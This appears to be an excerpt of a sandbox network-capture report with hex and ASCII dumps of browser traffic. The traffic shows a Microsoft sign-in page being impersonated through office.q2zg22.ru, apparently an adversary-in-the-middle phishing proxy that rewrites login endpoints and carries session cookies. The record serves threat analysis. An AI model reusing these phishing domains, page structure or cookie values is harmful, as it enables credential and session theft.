                                                                                                                          2024-02-02 19:17:51 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.1649774152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:51 UTC656OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739554
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F495F4B8C
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/6D0E)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: b50870ec-e01e-0092-2a54-909485000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 3651
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.1649777152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC419OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:52 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21433401
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:52 GMT
                                                                                                                          Etag: 0x8DB5C3F466DE917
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:43 GMT
                                                                                                                          Server: ECAcc (aga/86F7)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 49998f76-601e-005e-781c-935ce1000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 1864
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:52 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.1649778152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC420OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:52 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739555
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:52 GMT
                                                                                                                          Etag: 0x8DB5C3F495F4B8C
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/6D0E)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: b50870ec-e01e-0092-2a54-909485000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 3651
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:52 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.1649779172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:52 UTC2721OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:17:52 UTC1351INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                                                                          Link: <https://aadcdn.msauth.net>; rel=dns-prefetch
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; Path=/; Expires=Sun, 03 Mar 2024 19:17:52 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; Path=/; Domain=office.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:17:52 UTC790INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 65 73 63 74 78 2d 46 66 77 67 57 6c 6e 54 43 6b 6f 3d 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 51 51 49 59 63 32 66 36 73 6a 6b 41 64 46 6d 6a 33 32 66 54 64 47 6a 62 48 79 36 72 35 7a 70 79 6d 48 6e 72 49 6c 2d 71 78 47 6d 32 4d 35 71 65 31 76 51 79 5f 75 4e 78 6c 41 4c 38 47 4d 78 51 74 39 45 42 4e 49 31 45 47 63 44 4e 58 4f 56 72 59 71 61 4f 65 67 30 57 50 49 55 71 62 6e 4d 32 71 31 53 36 51 34 57 4b 4d 63 57 75 44 50 62 38 4e 67 66 4d 70 38 45 6b 56 4b 44 6d 72 2d 4d 36 35 65 55 73 4a 39 6b 63 7a 44 44 31 68 72 41 5a 4a 59 43 5a 65 43 41 41 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6f 66 66 69 63 65 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74 70 4f 6e
                                                                                                                          Data Ascii: Set-Cookie: esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; Path=/; Domain=office.q2zg22.ru; HttpOn
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 34 30 30 30 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e
                                                                                                                          Data Ascii: 4000... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 2b 69 64 5f 74 6f 6b 65 6e 5c 75 30 30 32 36 73 74 61 74 65 3d 52 31 62 74 6a 6c 4c 6e 30 6e 73 5a 5f 48 76 79 62 49 31 69 51 57 37 39 65 67 4a 34 62 66 4e 68 4b 36 64 6b 4f 6d 59 63 70 62
                                                                                                                          Data Ascii: 5b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=code+id_token\u0026state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpb
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 64 22 3a 22 68 74 74 70 73 3a 2f 2f 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63
                                                                                                                          Data Ascii: d":"https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=c
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 58 7e c3 85 6c 61 6e 64 20 49 73 6c 61 6e 64 73 7e 33 35 38 21 21 21 41 4c 7e 41 6c 62 61 6e 69 61 7e 33 35 35 21 21 21 44 5a 7e 41 6c 67 65 72 69 61 7e 32 31 33 21 21 21 41 53 7e 41 6d 65 72 69 63 61 6e 20 53 61 6d 6f 61 7e 31 21 21 21 41 44 7e 41 6e 64 6f 72 72 61 7e 33 37 36 21 21 21 41 4f 7e 41 6e 67 6f 6c 61 7e 32 34 34 21 21 21 41 49 7e 41 6e 67 75 69 6c 6c 61 7e 31 21 21 21 41 47 7e 41 6e 74 69 67 75 61 20 61 6e 64 20 42 61 72 62 75 64 61 7e 31 21 21 21 41 52 7e 41 72 67 65 6e 74 69 6e 61 7e 35 34 21 21 21 41 4d 7e 41 72 6d 65 6e 69 61 7e 33 37 34 21 21 21 41 57 7e 41 72 75 62 61 7e 32 39 37 21 21 21 41 43 7e 41 73 63 65 6e 73 69 6f 6e 20 49 73 6c 61 6e 64 7e 32 34 37 21 21 21 41 55 7e 41 75 73 74 72 61 6c 69 61 7e 36 31 21 21 21 41 54 7e 41 75 73
                                                                                                                          Data Ascii: X~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Aus
                                                                                                                          2024-02-02 19:17:52 UTC1369INData Raw: 21 46 4f 7e 46 61 72 6f 65 20 49 73 6c 61 6e 64 73 7e 32 39 38 21 21 21 46 4a 7e 46 69 6a 69 7e 36 37 39 21 21 21 46 49 7e 46 69 6e 6c 61 6e 64 7e 33 35 38 21 21 21 46 52 7e 46 72 61 6e 63 65 7e 33 33 21 21 21 47 46 7e 46 72 65 6e 63 68 20 47 75 69 61 6e 61 7e 35 39 34 21 21 21 50 46 7e 46 72 65 6e 63 68 20 50 6f 6c 79 6e 65 73 69 61 7e 36 38 39 21 21 21 47 41 7e 47 61 62 6f 6e 7e 32 34 31 21 21 21 47 4d 7e 47 61 6d 62 69 61 7e 32 32 30 21 21 21 47 45 7e 47 65 6f 72 67 69 61 7e 39 39 35 21 21 21 44 45 7e 47 65 72 6d 61 6e 79 7e 34 39 21 21 21 47 48 7e 47 68 61 6e 61 7e 32 33 33 21 21 21 47 49 7e 47 69 62 72 61 6c 74 61 72 7e 33 35 30 21 21 21 47 52 7e 47 72 65 65 63 65 7e 33 30 21 21 21 47 4c 7e 47 72 65 65 6e 6c 61 6e 64 7e 32 39 39 21 21 21 47 44 7e 47
                                                                                                                          Data Ascii: !FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~G
